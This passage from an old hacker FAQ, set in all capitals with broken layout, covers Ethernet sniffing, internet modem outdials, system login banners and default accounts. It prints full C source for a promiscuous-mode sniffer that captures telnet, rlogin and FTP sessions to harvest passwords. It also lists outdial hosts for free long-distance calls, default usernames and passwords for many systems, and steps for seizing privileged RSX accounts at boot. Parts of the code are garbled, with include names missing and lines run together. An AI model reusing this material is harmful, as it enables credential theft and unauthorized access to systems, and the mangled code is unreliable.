        NEWLINES, AND FORM FEEDS) TO BE DISPLAYED.  CONTROL CHARACTERS
                                       
           ARE DISPLAYED AS ^X (X), WHERE X IS THE KEY PRESSED WITH
                                       
              THE  KEY (FOR EXAMPLE, M IS DISPLAYED AS ^M).  THE
                                       
              CHARACTER (OCTAL 0177) IS PRINTED AS ^?.  NON-ASCII
                                       
         CHARACTERS (WITH THE HIGH BIT SET) ARE PRINTED AS M -X, WHERE
                                       
           X IS THE CHARACTER SPECIFIED BY THE SEVEN LOW ORDER BITS.

                                                             #hack FAQ (43/770)
          -T  CAUSES TABS TO BE PRINTED AS ^I AND FORM FEEDS AS ^L.  THIS
                                       
             OPTION IS IGNORED IF THE -V OPTION IS NOT SPECIFIED.
                                       
        -E  CAUSES A ``


' CHARACTER TO BE PRINTED AT THE END OF EACH LINE
                                       
          (PRIOR TO THE NEW-LINE).  THIS OPTION IS IGNORED IF THE -V
                                       
                              OPTION IS NOT SET.
                                       
           IF THE DIRECTORY NAME INCLUDES A  OR A  YOU WILL NEED TO
            ENCLOSE THE ENTIRE DIRECTORY NAME IN QUOTES.  EXAMPLE:
                                       
                                    CD ".."
                                       
     ON AN IBM-PC, YOU MAY ENTER THESE SPECIAL CHARACTERS BY HOLDING DOWN
       THE  KEY AND ENTERING THE DECIMAL VALUE OF THE SPECIAL CHARACTER
        ON YOUR NUMERIC KEYPAD.  WHEN YOU RELEASE THE  KEY, THE SPECIAL
      CHARACTER SHOULD APPEAR ON YOUR SCREEN.  AN ASCII CHART CAN BE VERY
                                   HELPFUL.
                                       
                                       

                                                             #hack FAQ (43/792)
                        17. WHAT IS ETHERNET SNIFFING?
                                       
      ETHERNET SNIFFING IS LISTENING (WITH SOFTWARE) TO THE RAW ETHERNET
       DEVICE FOR PACKETS THAT INTEREST YOU.  WHEN YOUR SOFTWARE SEES A
      PACKET THAT FITS CERTAIN CRITERIA, IT LOGS IT TO A FILE.  THE MOST
     COMMON CRITERIA FOR AN INTERESTING PACKET IS ONE THAT CONTAINS WORDS
                          LIKE "LOGIN" OR "PASSWORD."
                                       
      MANY ETHERNET SNIFFERS ARE AVAILABLE, HERE ARE A FEW THAT MAY BE ON
                               YOUR SYSTEM NOW:
                                       
                            OS              SNIFFER
                            ~~              ~~~~~~~
              HP/UX           NETTL (MONITOR) & NETFMT (DISPLAY)
                       NFSWATCH        /* AVAILABLE VIA ANONYMOUS FTP */
       IRIX            NFSWATCH        /* AVAILABLE VIA ANONYMOUS FTP */
                           SUNOS           ETHERFIND
                       NFSWATCH        /* AVAILABLE VIA ANONYMOUS FTP */
                             SOLARIS         SNOOP
       DOS             ETHLOAD         /* AVAILABLE VIA ANONYMOUS FTP */
                                       
                                       

                                                             #hack FAQ (43/814)
                                   LANWATCH
                                          THE GOBBLER
                                       
                                       
                                    NETMON
                  NETZHACK        /* MISTRESS.INFORMATIK.UNIBW-MUENCHEN.DE */
                                            /* /PUB/NETZHACK.MAC */
                                           LANPATROL
                                       
                                       
                                   NETWATCH
                                       
                 HERE IS SOURCE CODE FOR AN ETHERNET SNIFFER:
                                       
                                /* ESNIFF.C */
                                       
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                       
                                   #INCLUDE
                                   #INCLUDE

                                                             #hack FAQ (43/836)
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                       
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                       
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                   #INCLUDE
                                       

                                                             #hack FAQ (43/858)
                                   #INCLUDE
                                   #INCLUDE
                                       
                              #DEFINE ERR STDERR
                                       
                              CHAR    *MALLOC();
                               CHAR    *DEVICE,
                                      *PROGNAME,
                                       *LOGNAME;
                                 FILE    *LOG;
                               INT     DEBUG=0;
                                       
                        #DEFINE NIT_DEV     "/DEV/NIT"
           #DEFINE CHUNKSIZE   4096        /* DEVICE BUFFER SIZE */
                              INT     IF_FD = -1;
                         INT     PACKET[CHUNKSIZE+32];
                                       
                              VOID PEXIT(ERR,MSG)
                              INT ERR; CHAR *MSG;
                                { PERROR(MSG);
                                  EXIT(ERR); }
                                       

                                                             #hack FAQ (43/880)
                              VOID ZEXIT(ERR,MSG)
                              INT ERR; CHAR *MSG;
                              { FPRINTF(ERR,MSG);
                                  EXIT(ERR); }
                                       
                   #DEFINE IP          ((STRUCT IP *)PACKET)
                         #DEFINE IP_OFFSET   (0X1FFF)
               #DEFINE SZETH       (SIZEOF(STRUCT ETHER_HEADER))
                    #DEFINE IPLEN       (NTOHS(IP->IP_LEN))
                        #DEFINE IPHLEN      (IP->IP_HL)
                      #DEFINE TCPOFF      (TCPH->TH_OFF)
                       #DEFINE IPS         (IP->IP_SRC)
                       #DEFINE IPD         (IP->IP_DST)
                     #DEFINE TCPS        (TCPH->TH_SPORT)
                     #DEFINE TCPD        (TCPH->TH_DPORT)
                #DEFINE IPEQ(S,T)   ((S).S_ADDR == (T).S_ADDR)
                                       
                #DEFINE TCPFL(FLAGS) (TCPH->TH_FLAGS & (FLAGS))
                                       
                           #DEFINE MAXBUFLEN  (128)
                             TIME_T  LASTTIME = 0;
                                       

                                                             #hack FAQ (43/902)
                                 STRUCT CREC {
                                 STRUCT CREC *NEXT,
                                             *LAST;
                    TIME_T  TIME;              /* START TIME */
                               STRUCT IN_ADDR SRCIP,
                                              DSTIP;
                   U_INT   SRCPORT,           /* SRC/DST PORTS */
                                          DSTPORT;
                U_CHAR  DATA[MAXBUFLEN+2]; /* IMPORTANT STUFF :-) */
                U_INT   LENGTH;            /* CURRENT DATA LENGTH */
                      U_INT   PKCNT;             /* # PKTS */
                                  U_LONG  LASTSEQ;
                                      };
                                       
                          STRUCT CREC *CLROOT = NULL;
                                       
                               CHAR *SYMADDR(IP)
                          REGISTER STRUCT IN_ADDR IP;
                        { REGISTER STRUCT HOSTENT *HE =
         GETHOSTBYADDR((CHAR *)&IP.S_ADDR, SIZEOF(STRUCT IN_ADDR),AF_INET);
                                       
                  RETURN( (HE)?(HE->H_NAME):(INET_NTOA(IP)) );

                                                             #hack FAQ (43/924)
                                       }
                                       
                             CHAR *TCPFLAGS(FLGS)
                             REGISTER U_CHAR FLGS;
                            { STATIC CHAR IOBUF[8];
              #DEFINE SFL(P,THF,C) IOBUF[P]=((FLGS & THF)?C:'-')
                                       
                               SFL(0,TH_FIN, 'F');
                               SFL(1,TH_SYN, 'S');
                               SFL(2,TH_RST, 'R');
                               SFL(3,TH_PUSH,'P');
                               SFL(4,TH_ACK, 'A');
                               SFL(5,TH_URG, 'U');
                                   IOBUF[6]=0;
                                 RETURN(IOBUF);
                                       }
                                       
                               CHAR *SERVP(PORT)
                             REGISTER U_INT PORT;
                            { STATIC CHAR BUF[10];
                                REGISTER CHAR *P;
                                       

                                                             #hack FAQ (43/946)
                                  SWITCH(PORT) {
                    CASE IPPORT_LOGINSERVER: P="RLOGIN"; BREAK;
                    CASE IPPORT_TELNET:      P="TELNET"; BREAK;
                     CASE IPPORT_SMTP:        P="SMTP"; BREAK;
                      CASE IPPORT_FTP:         P="FTP"; BREAK;
                   DEFAULT: SPRINTF(BUF,"%U",PORT); P=BUF; BREAK;
                                        }
                                    RETURN(P);
                                       }
                                       
                                 CHAR *PTM(T)
                              REGISTER TIME_T *T;
                        { REGISTER CHAR *P = CTIME(T);
                     P[STRLEN(P)-6]=0; /* STRIP " YYYY\N" */
                                   RETURN(P);
                                       }
                                       
                                 CHAR *NOWTM()
                                 { TIME_T TM;
                                   TIME(&TM);
                               RETURN( PTM(&TM) );
                                       }

                                                             #hack FAQ (44/969)
                     #DEFINE MAX(A,B) (((A)>(B))?(A):(B))
                       #DEFINE MIN(A,B) (((A)TIME) ); \
                       CLTMP->SRCIP.S_ADDR = SIP.S_ADDR; \
                       CLTMP->DSTIP.S_ADDR = DIP.S_ADDR; \
                            CLTMP->SRCPORT = SPORT; \
                            CLTMP->DSTPORT = DPORT; \
                      CLTMP->LENGTH = MIN(LEN,MAXBUFLEN); \
         BCOPY( (U_CHAR *)DATA, (U_CHAR *)CLTMP->DATA, CLTMP->LENGTH); \
                               CLTMP->PKCNT = 1; \
                             CLTMP->NEXT = CLROOT; \
                              CLTMP->LAST = NULL; \
                                CLROOT = CLTMP; \
                                       }
                                       
                 REGISTER STRUCT CREC *GET_NODE(SIP,SP,DIP,DP)
                       REGISTER STRUCT IN_ADDR SIP,DIP;
                             REGISTER U_INT SP,DP;
                     { REGISTER STRUCT CREC *CLR = CLROOT;
                                       
                              WHILE(CLR != NULL) {
                IF( (CLR->SRCPORT == SP) && (CLR->DSTPORT == DP) &&
                    IPEQ(CLR->SRCIP,SIP) && IPEQ(CLR->DSTIP,DIP) )

                                                             #hack FAQ (44/991)
                                          BREAK;
                                 CLR = CLR->NEXT;
                                        }
                                  RETURN(CLR);
                                       }
                                       
                     #DEFINE ADDDATA_NODE(CL,DATA,LEN) { \
         BCOPY((U_CHAR *)DATA, (U_CHAR *)&CL->DATA[CL->LENGTH],LEN); \
                              CL->LENGTH += LEN; \
                                       }
                                       
                         #DEFINE PR_DATA(DP,LN) {    \
                           REGISTER U_CHAR LASTC=0; \
                               WHILE(LN-- >0) { \
                                   IF(*DP TIME));
    FPRINTF(LOG," PATH: %S(%S) =>", SYMADDR(CLE->SRCIP),SERVP(CLE->SRCPORT));
        FPRINTF(LOG," %S(%S)\N", SYMADDR(CLE->DSTIP),SERVP(CLE->DSTPORT));
                FPRINTF(LOG," STAT: %S, %D PKTS, %D BYTES [%S]\N",
                               NOWTM(),CLE->PKCNT,(CLE->LENGTH+DL),MSG);
                             FPRINTF(LOG," DATA: ");
                         { REGISTER U_INT I = CLE->LENGTH;
                           REGISTER U_CHAR *P = CLE->DATA;

                                                            #hack FAQ (44/1013)
                                    PR_DATA(P,I);
                                   PR_DATA(D,DL);
                                         }
                                       
                             FPRINTF(LOG,"\N-- \N");
                                   FFLUSH(LOG);
                                       
                              IF(CLE->NEXT != NULL)
                           CLE->NEXT->LAST = CLE->LAST;
                              IF(CLE->LAST != NULL)
                           CLE->LAST->NEXT = CLE->NEXT;
                                       ELSE
                                CLROOT = CLE->NEXT;
                                    FREE(CLE);
                                       }
                                       
                         /* 30 MINS (X 60 SECONDS) */
                           #DEFINE IDLE_TIMEOUT 1800
                            #DEFINE IDLE_NODE() { \
                                  TIME_T TM; \
                                  TIME(&TM); \
                               IF(LASTTIMENEXT; \

                                                            #hack FAQ (44/1035)
                              IF(CLE->TIME ETHER_TYPE);
                                       
            IF(ETHERTYPE IP_P != IPPROTO_TCP) /* CHUK NON TCP PKTS */
                                      RETURN;
                   TCPH = (STRUCT TCPHDR *)(PACKET + IPHLEN);
                                       
                        IF(!( (TCPD == IPPORT_TELNET) ||
                           (TCPD == IPPORT_LOGINSERVER) ||
                                 (TCPD == IPPORT_FTP)
                                    )) RETURN;
                                       
                          { REGISTER STRUCT CREC *CLM;
          REGISTER INT LENGTH = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
                      REGISTER U_CHAR *P = (U_CHAR *)PACKET;
                                       
                       P += ((IPHLEN * 4) + (TCPOFF * 4));
                                       
                                  IF(DEBUG) {
        FPRINTF(LOG,"PKT: (%S %04X) ", TCPFLAGS(TCPH->TH_FLAGS),LENGTH);
             FPRINTF(LOG,"%S[%S] => ", INET_NTOA(IPS),SERVP(TCPS));
              FPRINTF(LOG,"%S[%S]\N", INET_NTOA(IPD),SERVP(TCPD));
                                       }

                                                            #hack FAQ (45/1058)
                   IF( CLM = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
                                       
                                    CLM->PKCNT++;
                                       
                                    IF(LENGTH>0)
                      IF( (CLM->LENGTH + LENGTH)  %S\N",NOWTM());
                                   FFLUSH(LOG);
                                 IF(LOG != STDOUT)
                                     FCLOSE(LOG);
                                     EXIT(1);
                                       }
                                       
        /* OPENS NETWORK INTERFACE, PERFORMS IOCTLS AND READS FROM IT,
                       * PASSING DATA TO FILTER FUNCTION
                                       */
                                 VOID DO_IT()
                                       {
                                      INT CC;
                                    CHAR *BUF;
                                U_SHORT SP_TS_LEN;
                                       
                           IF(!(BUF=MALLOC(CHUNKSIZE)))

                                                            #hack FAQ (45/1080)
                                PEXIT(1,"ETH: MALLOC");
                                       
        /* THIS /DEV/NIT INITIALIZATION CODE PINCHED FROM ETHERFIND */
                                        {
                                STRUCT STRIOCTL SI;
                               STRUCT IFREQ    IFR;
                             STRUCT TIMEVAL  TIMEOUT;
                           U_INT  CHUNKSIZE = CHUNKSIZE;
                          U_LONG IF_FLAGS  = NI_PROMISC;
                                       
                    IF((IF_FD = OPEN(NIT_DEV, O_RDONLY)) = 0) {
                               REGISTER CHAR *BP = BUF,
                                       *BUFSTOP = (BUF + CC);
                                       
                                 WHILE (BP NHB_TOTLEN;
                           FILTER(CP, (U_LONG)HDRP->NHB_MSGLEN);
                                           }
                                         }
                             PEXIT((-1),"ETH: READ");
                                       }
   /* AUTHORIZE YOUR PROOGIE,GENERATE YOUR OWN PASSWORD AND UNCOMMENT HERE */
                   /* #DEFINE AUTHPASSWD "ELOIZGZEJWYMS" */

                                                            #hack FAQ (46/1103)
                                VOID GETAUTH()
                       { CHAR *BUF,*GETPASS(),*CRYPT();
                             CHAR PWD[21],PRMPT[81];
                                       
                              STRCPY(PWD,AUTHPASSWD);
                        SPRINTF(PRMPT,"(%S)UP? ",PROGNAME);
                                BUF=GETPASS(PRMPT);
                          IF(STRCMP(PWD,CRYPT(BUF,PWD)))
                                       EXIT(1);
                                       }
                                        */
                             VOID MAIN(ARGC, ARGV)
                                   INT ARGC;
                                 CHAR **ARGV;
                                       {
                               CHAR   CBUF[BUFSIZ];
                                STRUCT IFCONF IFC;
                                     INT    S,
                                          AC=1,
                                         BACKG=0;
                                       
                                 PROGNAME=ARGV[0];

                                                            #hack FAQ (47/1126)
                              /*     GETAUTH(); */
                                       
                                     LOG=NULL;
                                   DEVICE=NULL;
                                WHILE((ACIFR_NAME;
                                         }
                                       
           FPRINTF(ERR,"USING LOGICAL DEVICE %S [%S]\N",DEVICE,NIT_DEV);
              FPRINTF(ERR,"OUTPUT TO %S.%S%S",(LOG)?LOGNAME:"STDOUT",
                  (DEBUG)?" (DEBUG)":"",(BACKG)?" BACKGROUNDING ":"\N");
                                       
                                     IF(!LOG)
                                      LOG=STDOUT;
                                       
                              SIGNAL(SIGINT, DEATH);
                              SIGNAL(SIGTERM,DEATH);
                              SIGNAL(SIGKILL,DEATH);
                              SIGNAL(SIGQUIT,DEATH);
                                       
                               IF(BACKG && DEBUG) {
                      FPRINTF(ERR,"[CANNOT BG WITH DEBUG ON]\N");
                                        BACKG=0;

                                                            #hack FAQ (47/1148)
                                         }
                                       
                                    IF(BACKG) {
                                    REGISTER INT S;
                                       
                                  IF((S=FORK())>0) {
                               FPRINTF(ERR,"[PID %D]\N",S);
                                         EXIT(0);
                                   } ELSE IF(S0 ) {
                               IOCTL(S,TIOCNOTTY,(CHAR *)NULL);
                                           CLOSE(S);
                                           }
                                         }
        FPRINTF(LOG,"\NLOG STARTED AT => %S [PID %D]\N",NOWTM(),GETPID());
                                   FFLUSH(LOG);
                                       
                                     DO_IT();
                                       }
                                       
                                       
                       18. WHAT IS AN INTERNET OUTDIAL?
                                       

                                                            #hack FAQ (47/1170)
     AN INTERNET OUTDIAL IS A MODEM CONNECTED TO THE INTERNET THAN YOU CAN
    USE TO DIAL OUT.  NORMAL OUTDIALS WILL ONLY CALL LOCAL NUMBERS.  A GOD
    (GLOBAL OUTDIAL) IS CAPABLE OF CALLING LONG DISTANCE.  OUTDIALS ARE AN
              INEXPENSIVE METHOD OF CALLING LONG DISTANCE BBS'S.
                                       
                                       
                     19. WHAT ARE SOME INTERNET OUTDIALS?
                                       
                                       
              AREA    ADDRESS(S)                      COMMAND(S)
         ------  ------------------------------- ---------------------
                             201     128.112.88.0
                                       
                                 128.112.88.1
                                       
                                 128.112.88.2
                                       
                                 128.112.88.3
         204     UMNET.CC.MANITOBA.CA            "DIAL12" OR "DIAL24"
                     206     DIALOUT24.CAC.WASHINGTON.EDU
                  215     WISEOWL.OCIS.TEMPLE.EDU         ATZ
                                       

                                                            #hack FAQ (51/1196)
                                 ATDT 9XXXYYYY
                                       
                 129.72.1.59                     HAYES COMPAT
                  218     AA28.D.UMN.EDU                  CLI
                                       
                                       
                                       
                                       
                                       
                                 RLOGIN MODEM
                                       
                                       
                                       
                                       
                                       
                               AT "LOGIN:" TYPE
                                       
                                       
                                       
                                       
                                       
                                    "MODEM"

                                                            #hack FAQ (52/1219)
                    MODEM.D.UMN.EDU                 "HAYES"
     232     ISN.RDNS.IASTATE.EDU            MODEM              [WORKS!!]
                                       
                                       
                                       
                                       
                                       
                                      ATZ
                                       
                                       
                                       
                                       
                                       
                                 ATDT8XXX-XXXX
  303     129.82.100.64                   LOGIN: MODEM       [NEED PASSWORD!]
                            307     MODEM.UWYO.EDU
                                       
                 129.72.1.59                     HAYES COMPAT
  313     35.1.1.6                        "DIAL2400-AA" OR   [CAN'T CONNECT]
                                       
                                       
                                       

                                                            #hack FAQ (54/1243)
                                 "DIAL1200-AA"
                315     198.36.22.3                     "MODEM"
              404     EMORY.EDU                       .MODEM8 OR
                                       
                                       
                                       
                                       
                                       
                                   .DIALOUT
                                       
                  BROADBAND.CC.EMORY.EDU          .MODEM8 OR
                                       
                                       
                                       
                                       
                                       
                                   .DIALOUT
                                       
                  128.140.1.239                   .MODEM8|CR
                                       
                                       
                                       

                                                            #hack FAQ (56/1267)
                                OR .MODEM96|CR
                  412     GATE.CIS.PITT.EDU               LAT
                                       
                                       
                                       
                                       
                                       
                                CONNECT DIALOUT
                                       
                                       
                                       
                                       
                                       
                                      ^E
                                       
                                       
                                       
                                       
                                       
                               ATDT 91K XXX-XXXX
          415     128.32.132.250                  "DIAL1" OR "DIAL2"
                 416     PACX.UTCS.UTORONTO.CA           MODEM

                                                            #hack FAQ (61/1294)
                                ATDT 9XXX-XXXX
              502     UKNET.UKY.EDU                   OUTDIAL2400
                                       
                                       
                                       
                                       
                                       
                                ATDT 9XXX-XXXX
         510     ANNEX132-1.EECS.BERKELEY.EDU    ATDT 9,,,,, XXX-XXXX
          514     132.204.2.11                    EXTERNE#9 9XXX-XXXX
              515     ISN.RDNS.IASTATE.EDU            LOGIN MODEM
                                       
                                       
                                       
                                       
                                       
                              DIAL ATDT8XXX-YYYY
         602     129.219.17.3                    ATDT8,,,,,XYYYXXXYYYY
                                       
                 129.219.17.3                    LOGIN: MODEM
                                       
                                       

                                                            #hack FAQ (64/1319)
                                ATDT 8XXX-XXXX
                609     129.72.1.59                     "HAYES"
                                       
                    128.119.131.110                 "HAYES"
                                       
                                128.119.131.111
                                       
                                128.119.131.112
                                       
                                128.119.131.113
                                       
                                128.119.131.114
                                       
                                128.112.131.110
                                       
                                128.112.131.111
                                       
                                128.112.131.112
                                       
                                128.112.131.113
                                       
              128.112.131.114                 THE ABOVE ARE HAYES

                                                            #hack FAQ (64/1341)
  614     NS2400.IRCC.OHIO-STATE.EDU      DIAL               [CAN'T CONNECT]
              615     DCA.UTK.EDU                     "DIAL2400"
                          617     DIALOUT.LCS.MIT.EDU
               619     DIALIN.UCSD.EDU                 "DIALOUT"
                                       
                      128.54.30.1                     NUE
            713     128.143.70.101                  "CONNECT HAYES"
                                       
                   128.249.27.154                  C MODEM96
                                       
                                       
                                       
                                       
                                       
                                ATDT 9XXX-XXXX
                                       
              128.249.27.153                  " -+ AS ABOVE +- "
                                       
                              MODEM24.BCM.TMC.EDU
                                       
                              MODEM12.BCM.TMC.EDU
            714     130.191.4.70                    ATDT 8XXX-XXXX

                                                            #hack FAQ (64/1363)
                804     UBLAN.ACC.VIRGINIA.EDU          C HAYES
                                       
                 128.143.70.101                  CONNECT HAYES
                                       
                                       
                                       
                                       
                                       
                                 ATDT XXX-XXXX
     902     STAR.CCS.TUNS.CA                "DIALOUT"          [DOWN...]
     916     128.120.2.251                   "DIALOUT"          [DOWN...]
                                       
      129.137.33.72                                      [CAN'T CONNECT]
  ???     DIALOUT1.PRINCETON.EDU                             [CAN'T CONNECT]
                                       
      DSWITCH.BYU.EDU                 "C MODEM"          [CAN'T CONNECT]
                                       
      MODEM.CIS.UFLU.EDU                                 [CAN'T CONNECT]
                                       
      R596ADI1.UC.EDU                                    [CAN'T CONNECT]
                                       
      VTNET1.CNS.UT.EDU               "CALL" OR "CALL"   [CAN'T CONNECT]

                                                            #hack FAQ (65/1386)
      18.26.0.55                                         [CAN'T CONNECT]
                                       
      128.173.5.4                                        [NEED PASSWORD!]
                                       
      128.187.1.2                                        [NEED PASSWORD!]
                                       
      129.137.33.71                                      [CAN'T CONNECT]
                                       
      BSTORM.BGA.COM / PORT=4000                         [WHAT IS THIS?]
                                       
                                       
                           20. WHAT IS THIS SYSTEM?
                                       
                                    AS/400
                                    ~~~~~~
                                    USERID?
                                   PASSWORD?
                                       
                             ONCE IN, TYPE GO MAIN
                                       
                                       
                                   CDC CYBER

                                                            #hack FAQ (65/1408)
                                   ~~~~~~~~~
                      WELCOME TO THE NOS SOFTWARE SYSTEM.
                      COPYRIGHT CONTROL DATA 1978, 1987.
                                       
                          88/02/16. 02.36.53. N265100
           CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
                                    FAMILY:
                                       
   YOU WOULD NORMALLY JUST HIT RETURN AT THE FAMILY PROMPT.  NEXT PROMPT IS:
                                       
                                  USER NAME:
                                       
                                       
                            HEWLETT PACKARD MPE-XL
                            ~~~~~~~~~~~~~~~~~~~~~~
                                    MPE XL:
                    EXPECTED A :HELLO COMMAND. (CIERR 6057)
                                    MPE XL:
          EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)
                                    MPE XL:
                                       
                                       

                                                            #hack FAQ (65/1430)
                                      GTN
                                      ~~~
                     WELCOME TO CITIBANK. PLEASE SIGN ON.
                                   XXXXXXXX
                                       
                                       @
                                  PASSWORD =
                                       
                                       @
                                       
                    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                       
                           PLEASE ENTER YOUR ID:-1->
                        PLEASE ENTER YOUR PASSWORD:-2->
                                       
                   CITICORP (CITY NAME). KEY GHELP FOR HELP.
                                     XXX.XXX
                      PLEASE SELECT SERVICE REQUIRED.-3->
                                       
                                       
                                    PRIMOS
                                    ~~~~~~

                                                            #hack FAQ (65/1452)
                            PRIMENET 19.2.7F PPOA1
                                       
                                       
                                       
                                      ER!
                                       
                    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                       
                                    CONNECT
                           PRIMENET V 2.3  (SYSTEM)
                             LOGIN           (YOU)
                           USER ID?        (SYSTEM)
                             SAPB5           (YOU)
                           PASSWORD?       (SYSTEM)
                             DROWSAP         (YOU)
                           OK,             (SYSTEM)
                                       
                                       
                                   ROLM-OSL
                                   ~~~~~~~~
               MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47
                                 RELEASE 8003

                                                            #hack FAQ (65/1474)
                                 OSL, PLEASE.
                                       ?
                                       
                                       
                                    TOPS-10
                                    ~~~~~~~
                                NIH TIMESHARING
                                       
                      NIH TRI-SMP 7.02-FF  16:30:04 TTY11
          SYSTEM 1378/1381/1453 CONNECTED TO NODE HAPPY(40) LINE # 12
                                 PLEASE LOGIN
                                       .
                                       
                                       
                                    VM/370
                                    ~~~~~~
                                    VM/370
                                       !
                                       
                                       
                  21. WHAT ARE THE DEFAULT ACCOUNTS FOR XXX?
                                       

                                                            #hack FAQ (65/1496)
                                      AIX
                                      ~~~
                             GUEST           GUEST
                                       
                                       
                                    AS/400
                                    ~~~~~~
         QSECOFR         QSECOFR         /* MASTER SECURITY OFFICER */
         QSYSOPR         QSYSOPR         /* SYSTEM OPERATOR         */
         QPGMR           QPGMR           /* DEFAULT PROGRAMMER      */
                                       
                                     ALSO
                                       
                         SECOFR/SECOFR (SOMETIMES...)
                                 IBM/PASSWORD
                                   IBM/2222
                                  IBM/SERVICE
                                       
                                       
                            HEWLETT PACKARD MPE-XL
                            ~~~~~~~~~~~~~~~~~~~~~~
                          FORMAT IS ACCOUNT.GROUP,JOB

                                                            #hack FAQ (66/1519)
                  HELLO           ACCOUNT           PASSWORD
                 ~~~~~           ~~~~~~~~~~~~~     ~~~~~~~~~~~
                          HELLO           MANAGER.SYS
                            HELLO           MGR.SYS
          HELLO           FIELD.SUPPORT     HPUNSUP OR SUPPORT OR HP
                          HELLO           OP.OPERATOR
                           MGR             CAROLIAN
                              MGR             CCC
                             MGR             CNAS
                             MGR             CONV
                            MGR             COGNOS
                            OPERATOR        COGNOS
                            MANAGER         COGNOS
                             OPERATOR        DISC
                            MGR             HPDESK
                            MGR             HPWORD
                            FIELD           HPWORD
                           MGR             HPOFFICE
                           SPOOLMAN        HPOFFICE
                           ADVMAIL         HPOFFICE
                           MAIL            HPOFFICE
                           WP              HPOFFICE

                                                            #hack FAQ (66/1541)
                           MANAGER         HPOFFICE
                            MGR             HPONLY
                            FIELD           HPP187
                            MGR             HPP187
                            MGR             HPP189
                            MGR             HPP196
                             MGR             INTX3
                            MGR             ITF3000
                            MANAGER         ITF3000
                             MAIL            MAIL
                            MGR             NETBASE
                             MGR             REGO
                              MGR             RJE
                            MGR             ROBELLE
                           MANAGER         SECURITY
                           MGR             SECURITY
                            FIELD           SERVICE
                              MANAGER         SYS
                              MGR             SYS
                              PCUSER          SYS
                              RSBCMON         SYS
                              OPERATOR        SYS

                                                            #hack FAQ (66/1563)
                            OPERATOR        SYSTEM
                            FIELD           SUPPORT
                            OPERATOR        SUPPORT
                              MANAGER         TCH
                            MAIL            TELESUP
                            MANAGER         TELESUP
                            MGR             TELESUP
                            SYS             TELESUP
                            MGE             VESOFT
                            MGE             VESOFT
                             MGR             WORD
                           MGR             XLSERVER
                                       
                        COMMON JOBS ARE PUB, SYS, DATA
      COMMON PASSWORDS ARE HPONLY, TELESUP, HP, MPE, MANAGER, MGR, REMOTE
                                       
                                       
                                   PICK O/S
                                   ~~~~~~~~
               DSA             # DESQUETOP SYSTEM ADMINISTRATOR
                                      DS
                                   DESQUETOP

                                                            #hack FAQ (66/1585)
                                    PHANTOM
                                       
                                       
                                     ROLM
                                     ~~~~
                                 CBX DEFAULTS
                                       
                              OP              OP
                           OP              OPERATOR
                             SU              SUPER
                              ADMIN           PWP
                           ENG             ENGINEER
                                       
                                       
                              PHONEMAIL DEFAULTS
                                       
                           SYSADMIN        SYSADMIN
                             TECH            TECH
                             POLL            TECH
                                       
                                       
                                      RSX

                                                            #hack FAQ (66/1607)
                                      ~~~
              SYSTEM/SYSTEM   (USERNAME SYSTEM, PASSWORD SYSTEM)
               1,1/SYSTEM      (DIRECTORY [1,1] PASSWORD SYSTEM)
                                  BATCH/BATCH
                                SYSTEM/MANAGER
                                   USER/USER
                                       
                        DEFAULT ACCOUNTS FOR MICRO/RSX:
                                       
                                       
                                       
                                   MICRO/RSX
                                       
       ALTERNATELY YOU CAN HIT   WHEN THE BOOT SEQUENCE ASKS YOU FOR THE
                       DATE AND CREATE AN ACCOUNT USING:
                                       
                                       
                                       
                                   RUN ACNT
                                       
                                   OR  RUN $ACNT
                                       

                                                            #hack FAQ (66/1629)
                    (NUMBERS BELOW 10 {OCT} ARE PRIVELEGED)
                                       
  REBOOT AND WAIT FOR THE DATE/TIME QUESTION. TYPE ^C AND AT THE MCR PROMPT,
                  TYPE "ABO AT." YOU MUST INCLUDE THE . DOT!
                                       
    IF THIS WORKS, TYPE "ACS LB0:/BLKS=1000" TO GET SOME SWAP SPACE SO THE
                             NEW STEP WON'T WEDGE.
                                       
     TYPE " RUN $ACNT" AND CHANGE THE PASSWORD OF ANY ACCOUNT WITH A GROUP
                             NUMBER OF 7 OR LESS.
                                       
        YOU MAY FIND THAT THE ^C DOES NOT WORK. TRY ^Z AND ESC AS WELL.
           ALSO TRY ALL 3 AS TERMINATORS TO VALID AND INVALID TIMES.
                                       
      IF NONE OF THE ABOVE WORK, USE THE HALT SWITCH TO HALT THE SYSTEM,
     JUST AFTER A INVALID DATE-TIME.  LOOK FOR A USER MODE PSW 1[4-7]XXXX.
   THEN DEPOSIT 177777 INTO R6, CROSS YOUR FINGERS, WRITE PROTECT THE DRIVE
   AND CONTINUE THE SYSTEM.  THIS WILL HOPEFULLY RESULT IN INDIRECT BLOWING
          UP...  AND HOPEFULLY THE SYSTEM HAS NOT BEEN FULLY SECURED.
                                       
                                       
                                   SYSTEM 75

                                                            #hack FAQ (66/1651)
                                   ~~~~~~~~~
                           USERNAME        PASSWORDS
                           ~~~~~~~~        ~~~~~~~~~
                            BCIM            BCIMPW
                            BCIIM           BCIIMPW
                         BCMS            BCMSPW, BCMS
                            BCNAS           BCNSPW
                            BLUE            BLUEPW
                       BROWSE          LOOKER, BROWSEPW
                    CRAFT           CRFTPW, CRAFTPW, CRACK
                            CUST            CUSTPW
                           ENQUIRY         ENQUIRYPW
                            FIELD           SUPPORT
                    INADS           INDSPW, INADSPW, INADS
                            INIT            INITPW
                            KRAFT           KRAFTPW
                           LOCATE          LOCATEPW
                       MAINT           MAINTPW, RWMAINT
                             NMS             NMSPW
                            RCUST           RCUSTPW
                           SUPPORT         SUPPORTPW
                             TECH            FIELD

                                                            #hack FAQ (70/1677)
                             VERIFONE JUNIOR 2.05
                             ~~~~~~~~~~~~~~~~~~~~
                           DEFAULT PASSWORD: 166816
                                       
                                       
                                      VMS
                                      ~~~
                            FIELD           SERVICE
                             SYSTEST         UTEP
                                       
                                       
